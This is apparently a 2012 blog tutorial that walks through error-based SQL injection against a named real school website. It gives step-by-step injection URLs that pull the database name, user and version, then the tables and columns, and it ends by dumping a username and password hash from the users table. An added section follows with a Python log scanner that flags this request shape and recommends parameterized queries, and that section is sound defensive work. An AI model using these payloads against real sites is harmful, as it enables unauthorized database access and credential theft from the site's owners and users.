Tuesday, August 21, 2012

[Tut] SQL injection sach.phuyen.edu.vn


Get database, user, version:

Code:
sach.phuyen.edu.vn/cocautochuc_view.php?id=07' and (select 1 from (select count(*),concat((select(select concat_ws(0x7c,database(),user(),version())) from information_schema.tables where table_schema=database()limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
Get table: tbl_users
Code:
sach.phuyen.edu.vn/cocautochuc_view.php?id=07'and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7c)) from information_schema.tables where table_schema=database() limit 70,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
Get columns of table tbl_users: username, passwd
Code:
sach.phuyen.edu.vn/cocautochuc_view.php?id=07'and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7c)) from information_schema.columns where table_name=0x74626c5f7573657273 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
Code:
sach.phuyen.edu.vn/cocautochuc_view.php?id=07'and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7c)) from information_schema.columns where table_name=0x74626c5f7573657273 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
Get the data in columns username, passwd:
Code:
sach.phuyen.edu.vn/cocautochuc_view.php?id=07'and (select 1 from (select count(*),concat((select(select concat(cast(concat(0x7c,username,0x7c,passwd,0x7c) as char),0x7e)) from tbl_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
|sach|0e33aad5b3773c3314fd289c4b4e80c4|
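
Every request above has the same shape: a quote after the id value, nested selects against information_schema, floor(rand(0)*2) with group by, hex literals, and a trailing --+ comment. The following is an added example, not part of the original post, showing how a defender could flag that shape in web server access logs. The log format, host paths, function names and the two-indicator threshold are assumptions, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Indicators drawn from the request shape shown in this post (names are hypothetical).
INDICATORS = {
    "rand_floor_group": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*group\s+by", re.S),
    "information_schema": re.compile(r"information_schema\s*\.\s*(tables|columns)"),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b"),
    "nested_select": re.compile(r"\(\s*select\b.*\(\s*select\b", re.S),
    "trailing_comment": re.compile(r"(--\s*|#)$"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines in an assumed combined-log style (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Aug/2012:10:00:01 +0700] "GET /view.php?id=07 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [21/Aug/2012:10:00:07 +0700] "GET /view.php?id=07%27+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+ HTTP/1.1" 200 312',
    '203.0.113.5 - - [21/Aug/2012:10:00:09 +0700] "GET /search.php?q=color+0xff00ff HTTP/1.1" 200 2048',
]

def normalise(value):
    """URL-decode twice (double encoding), lower-case, drop /* */ comments, collapse spaces."""
    for _ in range(2):
        value = unquote_plus(value)
    value = re.sub(r"/\*.*?\*/", " ", value.lower(), flags=re.S)
    return re.sub(r"\s+", " ", value).strip()

def score_request(target):
    """Return the sorted names of the indicators found in the request's query string."""
    query = normalise(urlsplit(target).query)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(query))

def scan(log_lines, threshold=2):
    """Return (line_number, indicators) for requests matching at least `threshold` indicators."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        matched = score_request(m.group(1))
        if len(matched) >= threshold:
            hits.append((n, matched))
    return hits

if __name__ == "__main__":
    for line_no, names in scan(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(names)}")
```

Requiring two indicators keeps the third sample line, a legitimate search containing a single hex-looking value, from being flagged. Log matching only surfaces the attempts; the underlying fix is to bind the id value as a query parameter instead of concatenating it into the SQL string.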
